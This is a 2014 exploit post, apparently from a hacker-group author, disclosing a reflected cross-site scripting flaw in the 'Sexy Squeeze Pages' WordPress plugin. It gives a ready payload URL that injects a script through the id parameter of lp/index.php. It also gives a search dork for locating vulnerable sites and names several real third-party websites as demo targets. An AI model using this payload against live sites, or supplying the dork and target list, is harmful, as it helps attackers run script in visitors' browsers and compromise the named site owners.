Home / exploits WordPress Sexy Squeeze Pages Cross Site Scripting
Posted on 26 November 2014
WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / http://h4x0resec.blogspot.com / | \ \____ /_______ //_______ / \______ / / / / ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : WordPress (Sexy Squeeze Pages) Plugin |~Software: http://instasqueeze.com/jv/ |~Vulnerability Style : Cross Site Scripting |[~]Date : "26.11.2014" |[~]Tested on : Kali Linux, Windows 7 |DORK: inurl:wp-content/plugins/instasqueeze ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | DEMO : http://instasqueeze.com ( Official ) http://gogglerank.com/ http://kangenwaterhq.com http://visualhandsconnect.com http://cynthialeecreations.com ==============[Exploitation]=============================== /instasqueeze/lp/index.php id parameter is ( index.php ) not safe. HTTP://[VICTIM]/wp-content/plugins/instasqueeze/lp/index.php?id="><script>alert(1337)</script>
